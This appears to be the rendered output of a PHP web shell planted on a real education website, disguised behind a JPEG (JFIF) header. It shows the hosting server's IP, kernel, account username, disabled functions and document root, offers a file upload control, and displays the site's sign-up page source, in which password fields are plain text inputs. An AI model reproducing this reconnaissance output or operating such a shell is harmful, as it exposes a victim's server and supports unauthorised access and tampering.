���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/aaryaedutech.com/public_html/ |
Upload File : |
<?php include_once './action/config.php'; ?> <!DOCTYPE html> <html lang="en"> <head> <!-- Required meta tags --> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- Link of CSS files --> <link rel="stylesheet" href="assets/css/bootstrap.min.css"> <link rel="stylesheet" href="assets/css/owl.carousel.min.css"> <link rel="stylesheet" href="assets/css/remixicon.css"> <link rel="stylesheet" href="assets/css/magnific-popup.min.css"> <link rel="stylesheet" href="assets/css/header.css"> <link rel="stylesheet" href="assets/css/style.css"> <link rel="stylesheet" href="assets/css/footer.css"> <link rel="stylesheet" href="assets/css/responsive.css"> <title><?= $shop . ' | ' . $page ?></title> <link rel="icon" type="image/png" href="assets/img/all-img/favicon.png"> </head> <body> <?php include './header.php' ?> <!-- Page Title Area Start--> <section class="page-title-area position-relative"> <div class="container"> <div class="main-max-width"> <div class="page-title-content"> <h2>Sign Up</h2> <ul class="page-breadcrumb align-items-center list-unstyle"> <li class="breadcrumb-item"><a href="index.html">Home</a></li> <li class="breadcrumb-item"></li> <li class="primery-link">Sign Up</li> </ul> <div class="shape-1 moveHorizontal"> <img src="assets/img/icon/shape-2.svg" alt="image"> </div> <div class="shape-2"> <img src="assets/img/icon/section-icon-1.svg" alt="image"> </div> <div class="shape-3 bounce"> <img src="assets/img/icon/section-icon-2.svg" alt="image"> </div> </div> </div> </div> </section> <!-- Page Title Area End--> <!-- Sign up Section Start--> <div class="sign-up-section ptb-100"> <div class="container"> <div class="main-max-width"> <div class="sign-content"> <div class="box-content text-center mb-30"> <h4>Welcome back</h4> <p>Hey there! Ready to log in? Just enter your username and password below and you'll be back in action in no time. Let's go!</p> </div> <div class="acount-s d-flex justify-content-between mb-20"> <a href="https://www.google.com/" target="_blank" class="btn"><img src="assets/img/icon/google.svg" alt="image"> Sign in with Google</a> <a href="https://www.facebook.com/" target="_blank" class="btn"><img src="assets/img/icon/facebook.svg" alt="image"> Sign in with Facebook</a> </div> <div class="text-sin text-center position-relative mb-10"> <p class="mb-0">Or Sign in with Email</p> </div> <div class="log-from mb-30"> <form> <div class="row"> <div class="col-lg-6"> <div class="form-group mb-15"> <label class="label-style">Fast Name</label> <input type="text" placeholder="Fast Name" class="bg-white input-style border-style w-100 h-60"> </div> </div> <div class="col-lg-6"> <div class="form-group mb-15"> <label class="label-style">Last Name</label> <input type="text" placeholder="Last Name" class="bg-white input-style border-style w-100 h-60"> </div> </div> </div> <div class="form-group mb-15"> <label class="label-style">Your email</label> <input type="email" placeholder="Your email" class="bg-white input-style border-style w-100 h-60"> </div> <div class="form-group mb-30"> <label class="label-style">Password</label> <input type="text" placeholder="password" class="bg-white input-style border-style w-100 h-60"> </div> <div class="form-group mb-30"> <label class="label-style">Confirm Password</label> <input type="text" placeholder="Confirm Password" class="bg-white input-style border-style w-100 h-60"> </div> <div class="meta-info d-flex justify-content-between mb-20"> <div class="form-check edu-check"> <input class="form-check-input edu-check-input" type="checkbox" value="" id="defaultCheck4"> <label class="form-check-label edu-check-label" for="defaultCheck4"> I agree to the terms of service </label> </div> </div> <a class="text-decoration-none btn style-one w-100 mb-20" href="#">Create Account</a> <a class="text-decoration-none btn style-one w-100 signin" href="sign-in.html">Sign In</a> </form> </div> <div class="sign-link text-center"> <span>Don't have an account? <a href="sign-in.html">Sign In</a></span> </div> </div> </div> </div> </div> <!-- Sign in Section End--> <?php include './footer.php' ?> </body> </html>